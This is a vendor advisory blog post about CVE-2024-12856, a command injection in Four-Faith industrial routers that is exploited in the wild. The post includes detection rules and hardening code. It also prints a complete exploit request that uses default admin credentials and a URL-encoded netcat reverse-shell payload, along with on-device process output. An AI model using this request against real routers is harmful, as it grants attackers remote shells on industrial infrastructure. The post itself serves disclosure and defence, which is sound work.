
Four-Faith Industrial Router CVE-2024-12856 Exploited in the Wild

Jacob Baines@Junior_Baines

VulnCheck observed a new post-authentication vulnerability affecting Four-Faith industrial routers being exploited in the wild. The attacker leveraged the router’s default credentials, effectively resulting in unauthenticated remote command injection. VulnCheck has assigned this issue CVE-2024-12856.

The attack can be conducted against, at least, the Four-Faith F3x24 and F3x36 over HTTP using the /apply.cgi endpoint. Censys finds approximately 15,000 internet-facing devices. The systems are vulnerable to OS command injection in the adj_time_year parameter when modifying the device’s system time via submit_type=adjust_sys_time. The following POST request demonstrates exploitation for a reverse shell.

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time

On the device, the result of the injection can be observed using ps:

20938 admin     1640 S    sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20940 admin     1640 S    sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20942 admin     1636 S    cat WaO
20943 admin     1636 S    /bin/sh -i
20945 admin     1636 S    nc 192.168.1.206 1270
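The ps listing shows the decoded year field being expanded inside `sh -c rtc_tm ss $(...)`, i.e. the CGI splices form values into a command string that a shell interprets. The following Python is an added illustration of that pattern next to the input handling that would close it; it is not Four-Faith firmware code. The `rtc_tm ss <year> <mon> <day> <hour> <min> <sec>` argument layout is an assumption based on the ps output, and the form bodies are constructed, with a harmless `$(id)` placeholder standing in for the payload.

```python
from datetime import datetime
from urllib.parse import parse_qs

# Field names from the apply.cgi request; argument order to rtc_tm is assumed.
ADJ_FIELDS = ("adj_time_year", "adj_time_mon", "adj_time_day",
              "adj_time_hour", "adj_time_min", "adj_time_sec")

# Constructed form bodies (not captured traffic). The injected one carries a
# harmless $(id) placeholder where the real payload sat.
BENIGN_BODY = ("adj_time_year=2024&adj_time_mon=10&adj_time_day=27&adj_time_hour=11"
               "&adj_time_min=35&adj_time_sec=32&submit_type=adjust_sys_time")
INJECTED_BODY = BENIGN_BODY.replace("adj_time_year=2024", "adj_time_year=%24%28id%29")


def unsafe_rtc_command(body: str) -> str:
    """Vulnerable pattern (hypothetical reconstruction): URL-decoded field values
    are spliced into one command string destined for `sh -c`, so `$(...)` in any
    field is expanded by the shell before rtc_tm ever sees it. The string is
    returned for inspection, never executed here."""
    form = parse_qs(body, keep_blank_values=True)
    values = [form.get(field, [""])[0] for field in ADJ_FIELDS]
    return "rtc_tm ss " + " ".join(values)


def safe_rtc_argv(body: str) -> list[str]:
    """Hardened form: allow-list each field as an ASCII decimal integer, check
    that the combination is a real calendar time, and build an argv list for
    exec without a shell. Raises ValueError on anything else."""
    form = parse_qs(body, keep_blank_values=True)
    parsed = {}
    for field in ADJ_FIELDS:
        raw = form.get(field, [""])[0]
        if not (raw.isascii() and raw.isdigit()):
            raise ValueError(f"{field}: expected a decimal integer, got {raw!r}")
        parsed[field] = int(raw)
    # datetime() rejects impossible components such as month 13 or hour 25.
    datetime(parsed["adj_time_year"], parsed["adj_time_mon"], parsed["adj_time_day"],
             parsed["adj_time_hour"], parsed["adj_time_min"], parsed["adj_time_sec"])
    return ["rtc_tm", "ss"] + [str(parsed[field]) for field in ADJ_FIELDS]


def accepts(body: str) -> bool:
    """True if the hardened validator would let this body through."""
    try:
        safe_rtc_argv(body)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    print("unsafe string:", unsafe_rtc_command(INJECTED_BODY))
    print("hardened argv:", safe_rtc_argv(BENIGN_BODY))
    print("hardened accepts injected body:", accepts(INJECTED_BODY))
```

The point of the hardened version is the combination: an allow-list (digits only, then a range check) rather than a blocklist of shell characters, and an argv list handed to exec so that no shell is involved even if a check were missed.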

For those who have an encyclopedic memory for exploits, this vulnerability should not be confused with CVE-2019-12168. While both flow through the apply.cgi endpoint, they attack different underlying components: CVE-2019-12168 targets submit_type=start with an OS command injection in the ping_ip parameter.

VulnCheck observed 178.215.238[.]91 attempting to exploit this vulnerability. Additionally, we note that this November 2024 blog also calls out exploitation of this vulnerability. Their observed User-Agent even matches the User-Agent VulnCheck observed in the wild (although we saw an entirely different payload).

The VulnCheck Initial Access team wrote the following Suricata rule to detect CVE-2024-12856 on the wire:

alert http any any -> any any ( \
    msg:"VULNCHECK Four-Faith CVE-2024-12856 Exploit Attempt"; \
    flow:to_server; \
    http.method; content:"POST"; \
    http.uri; content:"/apply.cgi"; startswith; \
    http.header_names; content:"Authorization"; \
    http.request_body; content:"change_action="; \
    content:"adjust_sys_time"; \
    pcre:"/adj_time_[^=]+=[a-zA-Z0-9]*[^a-zA-Z0-9=]/"; \
    classtype:web-application-attack; \
    reference:cve,CVE-2024-12856; \
    sid:12700438; rev:1;)
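To see what the rule actually checks, here is its logic ported to Python as an added example; it is not VulnCheck's code and does not replace the Suricata rule. The two sample requests are constructed: the first has the shape of the exploit attempt with a harmless `$(id)` placeholder in adj_time_year, the second is an ordinary time change. One caveat worth knowing before deploying: the pcre's final character class `[^a-zA-Z0-9=]` also accepts the `&` that separates form fields, so the pattern alone matches any adjust_sys_time body; the second function decodes each adj_time_* value and reports those containing shell metacharacters, which separates the two requests.

```python
import re
from urllib.parse import parse_qs

# Regex from the rule's pcre option (Suricata PCRE and Python re agree here).
ADJ_TIME_PCRE = re.compile(r"adj_time_[^=]+=[a-zA-Z0-9]*[^a-zA-Z0-9=]")

# Characters that, once a value is URL-decoded, mark command substitution,
# command separators or redirection inside what should be a clock field.
SHELL_METACHARS = set("$`;|&(){}<>")

# Constructed sample traffic, not captured data.
EXPLOIT_REQUEST = (
    "POST /apply.cgi HTTP/1.1\r\n"
    "Host: 192.168.1.1:90\r\n"
    "Authorization: Basic YWRtaW46YWRtaW4=\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10"
    "&adj_time_hour=11&adj_time_year=%24%28id%29&adj_time_min=35"
    "&submit_button=index&action=Save&submit_type=adjust_sys_time"
)
BENIGN_REQUEST = EXPLOIT_REQUEST.replace("adj_time_year=%24%28id%29",
                                         "adj_time_year=2024")


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, uri, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "uri": uri, "headers": headers, "body": body}


def matches_suricata_rule(raw: str) -> bool:
    """Apply the rule's conditions in order: POST, /apply.cgi prefix, an
    Authorization header, both request-body content matches, then the pcre."""
    req = parse_http_request(raw)
    return (
        req["method"] == "POST"
        and req["uri"].startswith("/apply.cgi")
        and "authorization" in req["headers"]
        and "change_action=" in req["body"]
        and "adjust_sys_time" in req["body"]
        and ADJ_TIME_PCRE.search(req["body"]) is not None
    )


def shell_metachar_fields(body: str) -> list[str]:
    """Decode every adj_time_* value and return the names of those containing
    shell metacharacters; legitimate clock values never do."""
    fields = parse_qs(body, keep_blank_values=True)
    flagged = [
        name for name, values in fields.items()
        if name.startswith("adj_time_")
        and any(SHELL_METACHARS & set(v) for v in values)
    ]
    return sorted(flagged)


if __name__ == "__main__":
    for label, req in (("exploit", EXPLOIT_REQUEST), ("benign", BENIGN_REQUEST)):
        body = parse_http_request(req)["body"]
        print(label, "rule match:", matches_suricata_rule(req),
              "flagged fields:", shell_metachar_fields(body))
```

In practice the Suricata rule is the thing you deploy; the Python port is for understanding which conditions fire and for triaging hits, where the decoded-value check tells a real injection attempt apart from an administrator setting the clock.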

Finally, pursuant to our vulnerability disclosure policy for vulnerabilities exploited in the wild, we notified Four-Faith and our customers about this issue on December 20, 2024. Questions about patches, affected models, and affected firmware versions should be directed at Four-Faith.

About VulnCheck

The VulnCheck Initial Access team is always on the lookout for new exploitation in the wild. For more research like this, see our blogs, PaperCut Exploitation, ProjectSend CVE-2024-11680 Exploited in the Wild, Fileless Remote Code Execution on Juniper Firewalls, and Does Confluence Dream of Shells?

Sign up to our website today to get free access to our VulnCheck KEV and request a trial of our Initial Access Intelligence and Exploit & Vulnerability Intelligence products.